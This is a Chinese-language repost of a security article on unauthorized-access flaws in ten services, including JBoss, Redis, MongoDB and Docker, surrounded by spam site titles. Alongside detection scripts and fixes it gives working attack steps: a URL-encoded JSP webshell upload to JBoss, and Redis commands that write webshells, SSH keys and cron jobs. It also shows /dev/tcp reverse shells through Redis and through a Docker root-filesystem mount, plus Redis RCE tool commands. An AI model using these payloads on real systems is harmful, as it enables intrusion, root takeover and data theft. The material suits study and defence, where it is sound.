成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

聊聊常見未授權訪問漏洞總結

安全 漏洞
ZooKeeper默認開啟在2181端口,在未進行任何訪問控制情況下,攻擊者可通過執行envi命令獲得系統大量的敏感信息,包括系統名稱、Java環境。

 [[334872]]

本文轉載自微信公眾號「Bypass」,作者Bypass 。轉載本文請聯系Bypass公眾號。

本文詳細地介紹了常見未授權訪問漏洞及其利用,具體漏洞列表如下:

  • Jboss 未授權訪問
  • Jenkins 未授權訪問
  • ldap未授權訪問
  • Redis未授權訪問
  • elasticsearch未授權訪問
  • MenCache未授權訪問
  • Mongodb未授權訪問
  • Rsync未授權訪問
  • Zookeeper未授權訪問
  • Docker未授權訪問

1、Jboss未授權訪問

漏洞原因:

在低版本中,默認可以訪問Jboss web控制臺(http://127.0.0.1:8080/jmx-console),無需用戶名和密碼。

 

漏洞利用:

1、寫入一句話木馬:

  1. http://127.0.0.1:8080/jmx-console//HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=August.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25+if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b+%25%3e&argType=boolean&arg4=True 

2、寫入1.txt文件

  1. http://127.0.0.1:8080/August/shell.jsp?f=1.txt&t=hello world! 

3、訪問1.txt文件

  1. http://127.0.0.1:8080/August/1.txt 

檢測工具:jexboss,一個使用Python編寫的Jboss漏洞檢測利用工具,通過它可以檢測并利用web-console,jmx-console,JMXInvokerServlet這三個漏洞,并且可以獲得一個shell。

修復建議:關閉jmx-console和web-console,提高安全性。

2、Jenkins 未授權訪問

漏洞原因:未設置密碼,導致未授權訪問。

漏洞測試:直接通過url訪問

  1. http://<target>:8080/manage 
  2. http://<target>:8080/script 

 

修復建議:設置強口令密碼。

3、ldap未授權訪問

漏洞原因:沒有對Ldap進行密碼驗證,導致未授權訪問。

檢測腳本:

  1. #! /usr/bin/env python 
  2. # _*_  coding:utf-8 _*_ 
  3.  
  4. from ldap3 import Connection,Server,ALL 
  5. def ldap_anonymous(ip): 
  6.     try: 
  7.         server = Server(ip,get_info=ALL,connect_timeout=1) 
  8.         conn = Connection(server, auto_bind=True
  9.         print "[+] ldap login for anonymous" 
  10.         conn.closed 
  11.     except
  12.         #pass 
  13.         print '[-] checking for ldap anonymous fail' 

利用工具:使用LdapBrowser直接連入,獲取敏感信息。

修復建議:增加強密碼驗證。

4、Redis未授權訪問

漏洞利用:

姿勢一:絕對路徑寫webshell

我們可以將dir設置為一個目錄a,而dbfilename為文件名b,再執行save或bgsave,則我們就可以寫入一個路徑為a/b的任意文件:

  1. config set dir /home/wwwroot/default
  2. config set dbfilename redis.php 
  3. set webshell "<?php phpinfo(); ?>" 
  4. save 

姿勢二:公私鑰認證獲取root權限

1、ssh免密碼配置

  1. ssh-keygen -t rsa -P ''     #生成公鑰/私鑰對                            
  2. cd /root/.ssh/ 
  3. (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt  #將公鑰寫入 foo.txt 文件 
  4. 連接 Redis 寫入文件 

2、連接Redis寫入文件

  1. cat foo.txt | ./redis-cli -h 192.168.125.140  -x set crackit 
  2. ./redis-cli -h 192.168.125.140 
  3. config set dir /root/.ssh/ 
  4. config get dir 
  5. config set dbfilename "authorized_keys" 
  6. save 

利用私鑰成功登錄redis服務器

 

姿勢三:利用contrab計劃任務反彈shell

  1. config set dir /var/spool/cron/crontabs/ 
  2. config set dbfilename root 
  3. flushall 
  4. set test "* * * * * /bin/bash -i >& /dev/tcp/10.1.1.211:1234 0>&1" 
  5. save 

姿勢四:主從復制RCE

在Reids 4.x之后,Redis新增了模塊功能,通過外部拓展,可以實現在Redis中實現一個新的Redis命令,通過寫C語言編譯并加載惡意的.so文件,達到代碼執行的目的。

通過腳本實現一鍵自動化getshell:

1、生成惡意.so文件,下載RedisModules-ExecuteCommand使用make編譯即可生成。

  1. git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand 
  2. cd RedisModules-ExecuteCommand/ 
  3. make 

2、攻擊端執行:python redis-rce.py -r 目標ip-p 目標端口 -L 本地ip -f 惡意.so

  1. git clone https://github.com/Ridter/redis-rce.git 
  2. cd redis-rce/ 
  3. cp ../RedisModules-ExecuteCommand/src/module.so ./ 
  4. pip install -r requirements.txt  
  5. python redis-rce.py -r 192.168.28.152 -p 6379 -L 192.168.28.137 -f module.so 

5、Elasticsearch未授權訪問

漏洞原因:Elasticsearch 默認端口為9200 ,攻擊者可以直接訪問http://ip:port。

檢測腳本:

  1. #! /usr/bin/env python 
  2. # _*_  coding:utf-8 _*_ 
  3.  
  4. import requests 
  5. def Elasticsearch_check(ip, port=9200, timeout=5): 
  6.     try: 
  7.       url = "http://"+ip+":"+str(port)+"/_cat" 
  8.       response = requests.get(url)  
  9.     except
  10.       pass 
  11.     if "/_cat/master" in response.content: 
  12.       print '[+] Elasticsearch Unauthorized: ' +ip+':'+str(port) 

漏洞測試:

  1. http://localhost:9200/_cat/indices 
  2. http://localhost:9200/_river/_search 查看數據庫敏感信息 
  3. http://localhost:9200/_nodes 查看節點數據 
  4.  
  5. 如有安裝head插件: 
  6. http://localhost:9200/_plugin/head/ web管理界面 

修復建議:

1、限制IP訪問,綁定固定IP

2、在config/elasticsearch.yml中為9200端口設置認證:

  1. http.basic.enabled true #開關,開啟會接管全部HTTP連接 
  2.   http.basic.user "admin" #賬號 
  3.   http.basic.password "admin_pw" #密碼 
  4.   http.basic.ipwhitelist ["localhost""127.0.0.1"

6、MenCache未授權訪問

漏洞原因:Memcached 分布式緩存系統,默認的 11211 端口不需要密碼即可訪問,黑客直接訪問即可獲取數據庫中所有信息,造成嚴重的信息泄露。

檢測腳本:

  1. #! /usr/bin/env python 
  2. # _*_  coding:utf-8 _*_ 
  3. def Memcache_check(ip, port=11211, timeout=5): 
  4.     try: 
  5.         socket.setdefaulttimeout(timeout) 
  6.         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
  7.         s.connect((ip, int(port))) 
  8.         s.send("stats\r\n"
  9.         result = s.recv(1024) 
  10.         if "STAT version" in result: 
  11.             print '[+] Memcache Unauthorized: ' +ip+':'+str(port) 
  12.     except Exception, e: 
  13.         pass 

漏洞驗證:

  1. #無需用戶名密碼,可以直接連接memcache 服務的11211端口。 
  2. telnet x.x.x.x  11211 
  3.  
  4. stats  //查看memcache 服務狀態 
  5. stats items  //查看所有items 
  6. stats cachedump 32 0  //獲得緩存key 
  7. get :state:264861539228401373:261588   //通過key讀取相應value ,獲得實際緩存內容,造成敏感信息泄露 

修復建議:綁定的ip地址為 127.0.0.1,或者通過firewall限制訪問。

7、Mongodb未授權訪問

漏洞原因:MongoDB 默認是沒有權限驗證的,登錄的用戶可以通過默認端口無需密碼對數據庫任意操作(增刪改高危動作),而且可以遠程訪問數據庫。

檢測腳本:

  1. #! /usr/bin/env python 
  2. # _*_  coding:utf-8 _*_ 
  3.  
  4. def mongodb(ip,port):     
  5.     try: 
  6.         client = MongoClient(ip,port) 
  7.         db=client.local 
  8.         flag = db.collection_names() 
  9.         if flag:     
  10.             print "[+] Mongodb login for anonymous" 
  11.     except Exception, e: 
  12.         pass 

修復建議:增加用戶密碼權限驗證,設置本地監聽或者訪問控制。

8、Rsync未授權訪問

漏洞原因:未配置賬號密碼認證,導致未授權訪問。

漏洞測試:

  1. 列舉整個同步目錄或指定目錄: 
  2. rsync 10.0.0.12 :: 
  3. rsync 10.0.0.12 :: www / 
  4.  
  5. 下載文件或目錄到本地: 
  6. rsync – avz 10.0.0.12 :: WWW/  /var/tmp 
  7. rsync – avz 10.0.0.12 :: www/  /var/tmp 
  8.  
  9. 上傳本地文件到服務端: 
  10. rsync -avz webshell 10.0.0.12 :: WWW / 

修復建議:增加用戶密碼認證,設置訪問ip限制。

9、Zookeeper未授權訪問

漏洞原因:ZooKeeper默認開啟在2181端口,在未進行任何訪問控制情況下,攻擊者可通過執行envi命令獲得系統大量的敏感信息,包括系統名稱、Java環境。

漏洞測試:

  1. echo envi|nc 192.168.15.74 2181 

 

修復建議:添加用戶名密碼認證,設置ip訪問控制。

10、Docker未授權訪問

漏洞原因:docker remote api可以執行docker命令,docker守護進程監聽在0.0.0.0,可直接調用API來操作docker。

  1. sudo dockerd -H unix:///var/run/docker.sock -H 0.0.0.0:2375 

漏洞利用:

通過docker daemon api 執行docker命令。

  1. #列出容器信息,效果與docker ps一致。 
  2. curl http://<target>:2375/containers/json 
  3.  
  4. #啟動容器 
  5. docker -H tcp://<target>:2375 ps -a 

1、新運行一個容器,掛載點設置為服務器的根目錄掛載至/mnt目錄下。

  1. sudo docker -H tcp://10.1.1.211:2375 run -it -v /:/mnt nginx:latest /bin/bash 

2、在容器內執行命令,將反彈shell的腳本寫入到/var/spool/cron/root

  1. echo '* * * * * /bin/bash -i >& /dev/tcp/10.1.1.214/12345 0>&1' >> /mnt/var/spool/cron/crontabs/root 

3、本地監聽端口,獲取對方宿主機shell。

 

 

責任編輯:武曉燕 來源: Bypass
相關推薦

2019-07-11 15:35:03

Redis數據庫設計

2016-11-08 19:56:09

GitLab漏洞遠程命令

2025-04-16 11:15:09

2013-10-28 09:09:23

2025-06-17 07:00:00

漏洞權限提升網絡安全

2019-10-24 10:14:30

2009-10-12 13:08:01

木馬病毒未授權控制軟件網絡安全

2022-06-30 11:57:04

安全措施未授權網絡訪問

2016-09-22 09:03:38

2013-09-04 10:41:08

2023-09-28 00:00:33

2020-08-16 20:36:21

滲透測試漏洞網絡攻擊

2021-09-08 08:55:45

Javascript 高階函數前端

2021-05-28 08:52:45

Hive分析函數

2022-02-07 21:49:19

串行通信UART

2023-08-14 07:01:06

2021-12-10 18:19:14

授權 Linkerd策略

2022-06-07 09:14:15

海運供應鏈網絡攻擊黑客

2021-07-07 05:43:47

漏洞網絡安全網絡攻擊

2023-11-28 09:19:12

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 日韩久久久久久 | 久久专区 | 一区二区在线免费观看 | 中文字幕一区二区三区四区 | 国产一级片91 | 国产免费一区二区 | 日韩在线一区二区三区 | 日韩精品一区二区三区在线播放 | 久久久久国产一区二区三区 | 91一区二区 | 日本视频中文字幕 | 五月婷婷激情网 | 久热免费在线 | 国产在线一区观看 | 亚洲一区二区三区免费在线观看 | 男人久久天堂 | 日韩精品一区二区三区 | 欧美高清一级片 | 九九热精品视频 | 国产97碰免费视频 | 狼人伊人影院 | 日韩精品久久久 | 九九热精品视频 | 亚洲视频一区二区三区 | 日韩中文字幕在线免费 | 亚洲一区二区久久 | 国产精品无码专区在线观看 | 99成人| 亚洲视频www | 亚洲欧美日韩精品久久亚洲区 | 高清黄色| 久久久九九 | 成人av鲁丝片一区二区小说 | 亚洲成人免费观看 | 久久精品在线播放 | 久久免费大片 | 欧美 日韩 国产 在线 | 国产日韩欧美一区二区 | 成人深夜福利网站 | 亚洲二区在线 | 欧美日韩在线观看一区 |